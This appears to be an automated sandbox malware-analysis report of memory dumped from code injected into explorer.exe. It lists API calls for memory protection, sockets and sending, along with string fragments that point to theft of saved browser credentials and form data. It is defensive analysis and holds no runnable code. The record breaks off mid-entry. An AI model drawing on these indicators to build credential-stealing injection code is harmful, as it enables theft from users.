                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction ID: 6ba7144eee67fa54b1d24910cb135411bc171771a0663fb3e0f792b596249446
                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction Fuzzy Hash: 5501B134628B884F8788EF6CD48016AB7E4FBCD318F000B3EE99AC3254EB70C5418B42
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 458 11397e0a-11397e38 459 11397e45-11397e6e NtProtectVirtualMemory 458->459 460 11397e40 call 11396942 458->460 461 11397e7d-11397e8f 459->461 462 11397e70-11397e7c 459->462 460->459
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 11397E67
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction ID: 4e706cd69ba7b3dc021d73f1243c06e1b59c3fbe5740500cdf3092dc593fd735
                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction Fuzzy Hash: 6901A234628B884B8749EF2C94412A6B3E5FBCE314F000B3EE99AC3244DB21D5028B82
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 113919A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: b0697cece543b59a83c068f89d47bee38e2d09ca3560c12629cfa27a9da25dcc
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: B631D131614A0D8BCB05EFA8C8847EEB7E0FB58318F40022AD44EE7244DE749645C789
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 113919A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: de616758436bc309cf8f47a1bedaebf0cec178f032c22f9362cb5b8e26120151
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 47219171614A4D8BCB05EFA8C8847EEBBA1FF58318F40422AD45AE7244DE749645CB89
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction ID: 2fc54e198b6f0b0e772a0cb2120f3c680f1b25fac9a290478766033032be03b9
                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction Fuzzy Hash: 3A413C74918A0CCFDB44EFA8C8987AD77F0FB58308F00466AD84ADB259DE309945CB85
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction ID: 16bc0d303eeffdabc85a39d9f1927eeab20ca19f8f762a8a3b3db6390883cf43
                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction Fuzzy Hash: 82411B74918A0C8FDB84EFA8C8987ED77F1FB98304F04416AD84EDB259DE309945CB85
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 289 1139372e-11393768 290 11393788-113937ab connect 289->290 291 1139376a-11393782 call 11396942 289->291 291->290
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction ID: b32bb9efc92c36e78db83ea40392a1eb6f51cada4c7b28af8e52cf558a006a1e
                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction Fuzzy Hash: 33011E74618B1C8FCB84EF5CE088B55B7E0FB59314F1545AED90DCB266C674D9818BC2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 294 11393732-11393768 295 11393788-113937ab connect 294->295 296 1139376a-11393782 call 11396942 294->296 296->295
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction ID: 62f9569be8bdbdf0b2adb7cf5d300aa69fb3ce9f689b06940da5f01e27bf9d5d
                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction Fuzzy Hash: 83012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1541AEE80DCB226CA74C9818BC2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 299 1139362c-1139366b 300 1139368b-113936a6 WSAStartup 299->300 301 1139366d-11393685 call 11396942 299->301 301->300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: Startup
                                            • String ID: WSAS$tart
                                            • API String ID: 724789610-2426239465
                                            • Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                            • Instruction ID: 6fc023a9d7353a521c64753db4ed83d6018ba9dd798bd829a8d8811536db4f85
                                            • Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                            • Instruction Fuzzy Hash: D8018B70519A188FCB44DF1CD088B69BBE0FB58315F2502ADD409CB26AC7B0C9428B96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 304 11393632-1139366b 305 1139368b-113936a6 WSAStartup 304->305 306 1139366d-11393685 call 11396942 304->306 306->305
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: Startup
                                            • String ID: WSAS$tart
                                            • API String ID: 724789610-2426239465
                                            • Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                            • Instruction ID: 36cfa3b3fca56a870b58c34f47757680727c1cc91177542076dd1d94aaa1dc81
                                            • Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                            • Instruction Fuzzy Hash: 28014B70519A188FCB44DF1C9088B69BBE0FB58355F2541A9E40DCB26AC7B0C9418B96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 417 113936b2-113936e5 418 11393705-1139372d send 417->418 419 113936e7-113936ff call 11396942 417->419 419->418
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: send
                                            • API String ID: 2809346765-2809346765
                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction ID: 9ee0346e1afe0be2d35a27aa99c4f54fdd4a806b07284f31eac5749c1e56bdeb
                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction Fuzzy Hash: 1A01127051CA1D8FDB84DF1CD048B5577E0EB58314F1546AED85DCB266C670D881CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 422 113935b2-113935ea 423 1139360a-1139362b socket 422->423 424 113935ec-11393604 call 11396942 422->424 424->423
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction ID: ba84e72dbab979a51a22ab183f14672a00d547e5a344ae864799f397d3790784
                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction Fuzzy Hash: 0D012C70618A1C8FCB84EF1CE048B54BBE0FB59314F1545AEE85ECB266C7B0C981CB86
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 427 1138b2dd-1138b320 call 11396942 430 1138b3fa-1138b40e 427->430 431 1138b326 427->431 432 1138b328-1138b339 SleepEx 431->432 432->432 433 1138b33b-1138b341 432->433 434 1138b34b-1138b352 433->434 435 1138b343-1138b349 433->435 436 1138b370-1138b376 434->436 437 1138b354-1138b35a 434->437 435->434 438 1138b35c-1138b36a call 11395f12 435->438 440 1138b378-1138b37e 436->440 441 1138b3b7-1138b3bd 436->441 437->436 437->438 438->436 440->441 443 1138b380-1138b38a 440->443 444 1138b3bf-1138b3cf call 1138be72 441->444 445 1138b3d4-1138b3db 441->445 443->441 446 1138b38c-1138b3b1 call 1138c432 443->446 444->445 445->432 448 1138b3e1-1138b3f5 call 1138b0f2 445->448 446->441 448->432
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction ID: b9e32df9baf6bdb86efbc49e83e32dbe9984aaddf92966ea3738ad4b617882fa
                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction Fuzzy Hash: 34316974614B4ADFDB58DF2980882A5BBA0FB54309F44437ECD6DCA20ECBB0A494CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction ID: b0204ac8432edb2d13ff256fa0301bb53e8e392da14b738a772f546e5a517c0a
                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction Fuzzy Hash: 28F0C234268A4D4FDB88EB2CD44562AF3D0FBE8218F41467EA54DC3268DA69D5828716
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 07ee989b90bd5ea56de5484998561acd3851f9f12606d666388241981145a891
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: 0CE16874618F488FC7A4DF68D4957AAB7E0FB58301F904A2EA59FC7241DF30A581CB89
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction ID: 0cdf228254c92ca4c761951516c48ca0844edc6cf63d405ea16988fbbf4b1dc4
                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction Fuzzy Hash: 2CB18D30518B488EDB59DF68C496AEEB7F1FF98300F50451EE49ACB252EF70A445CB86
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction ID: 87d25a136cbceb92e025111ad00c6c1c7b85e62c2c3bcbf312d22e2effb6c6a6
                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction Fuzzy Hash: 4F419F70A1CB088FDB14DF88B4866AD7BE2FB48708F40026EE409D3245DB75AD85CBD6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: 9df96923780edb2c6f09982bf4799e57b8ffe0b90dbf7c5ea83d3da4bd5793e6
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: CBC15B74218B088BC758EF28D4966AAF7E1FB94304F80472EA49EC7250DF30E555CBC6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                            • API String ID: 0-97273177
                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction ID: 10064b607d2673e99f111a1f3e7e6920c4181dea5eeaf7632caf8f8d4135eff3
                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction Fuzzy Hash: 7851A43151C7488FD719CF18E4816AAB7E5FB85700F90193EF8CB87242DBB4A946CB82
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction ID: b405a8c4e4a75ee373f02417829b3e3cfebde15198db8b680f45d7bf5bc3bd46
                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction Fuzzy Hash: 09C1607461CA194FC758EF68E496AAAF7E1FB94300F914329A44EC7251DF30E982CBC5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction ID: 8ef1f9e3013c0a58a94176751e2c967d9f49ba2363a3b16a4c1de6e49ee97ed3
                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction Fuzzy Hash: FCC1607461CA194FC758EF68E496AAAF7E1FB94300F914329A44EC7251DF30E982CBC5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction ID: 53f0b994ce18ee1abd2079d30858594c20cba9fe5758e7a30ffd31cfd9679c77
                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction Fuzzy Hash: 66A1907061CA4C8BDB18DFA894557EEB7E1FF98300F40462DE48AD7252EE709586CB89
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction ID: 7768d903aa6e848695680d7626cc326799474c7e49684def7d82cdfa00f3ad3a
                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction Fuzzy Hash: 5E91707061CB4C8BDB18DFA894547EEB7E1FB98300F40462EE48AD7252DF709546CB85
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction ID: 832ec4b2d4ca5f00099c2cf1ea0aff99e0774f75ba2d3ad4ef8aea63e7117c47
                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction Fuzzy Hash: 87719F3161CA498FDB58DFA8D4857AAB7F0FF98305F40062EE44AC7261EB70E945CB85
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: 02ae05a105d9d481fc785785744cbb90ff03cab2d92c1099d60bf51d12403af5
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: B4515EB0918B4C8BDB54DFA8D0456EEB7F1FF58301F80462EA49AD7254DF70A581CB89
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: 713382d5c5df1039fbff6ef52d6fadce9b5d744b8bf03cec031efcb79d341e9f
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: BC416F3461CB8C8BCBA5EF6898457EA77E4FB98301F81562E984EC7240EF30D585C786
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: e0a8470e3f50ada66b65eb1e75a8f448f0b0aebfbaaa508b78f0168261c5b125
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: 5F416030A1CE0D8FCB84EF58A1957AD77E1FB58345F81416EA80AD7244DA71D990CBC6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: 6f97f4825a4121964a531bcb246631cb7894f5778086de8918ce02c9a66cda0b
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 9541807060CB498FD799DF2C90843AAB7E1FBA8340F504A6E949EC3255DF70D985CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3617120072.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_107e0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction ID: 9bdc9f4b572d0e1bd5e9dde656e16bc7ffe29e9b08c236a9637440b76e25eb38
                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction Fuzzy Hash: 1931F27050DB885FD71ADB28D0956DAB7D0FB84300F90491EE49BC7292EE34A54ACB43
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
